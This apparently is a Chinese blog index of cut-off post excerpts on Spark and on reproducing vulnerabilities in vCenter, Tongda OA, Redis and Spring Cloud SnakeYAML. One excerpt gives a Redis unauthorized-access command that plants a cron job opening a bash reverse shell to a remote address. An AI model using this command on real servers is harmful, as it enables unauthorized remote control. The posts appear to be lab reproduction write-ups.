Spark简介 spark是一个实现快速通用的集群计算平台。它是由加州大学伯克利分校AMP实验室 开发的通用内存并行计算框架，用来构建大型的、低延迟的数据分析应用程序。它扩展了广泛使用的Map ...

Spark简介 spark是一个实现快速通用的集群计算平台。它是由加州大学伯克利分校AMP实验室 开发的通用内存并行计算框架，用来构建大型的、低延迟的数据分析应用程序。它扩展了广泛使用的Ma ...

0x00 Vmware vcenter信息 vSphere是VMware推出的虚拟化平台套件，包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为 ESX ...

环境搭建： 通达OA下载：https://www.tongda2000.com/download/2019.php 由于此版本已经修复，需要下载两个文件进行覆盖。 漏洞文件下载：https://github.com/jas502n/OA-tongda-RCE 注意：版本 ...

　　未授权无需认证访问内部数据库。 利用计划任务反弹shell redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config ...

0x00 漏洞简介： 漏洞出来第一时间，听漏洞浍测的朋友传来的情报，就及时给了POC，但一直没复现，只是简单看了文章，提到需要可以注册用户才能进行攻击，然后就感觉挺鸡肋，没有再继续看。 恰巧好基友涛子给我发来他复现的文章，看了看exp，感觉并没那么鸡肋，相反可以通过未授权进行权限的获取 ...

一、漏洞成因： 　　spring cloud在低版本下的 SnakeYAML 依赖组件存在反序列漏洞（所以有的利用叫：springcloud-snakeyaml-rce） 二、利用条件　　 　　Spring boot版本范围： 　　　　Spring Boot 2.X 　　 全部 ...

1. 来源 https://twitter.com/ptswarm/status/1338477426276511749 https://mp.weixin.qq.com/s/4ayfBOYJZS ...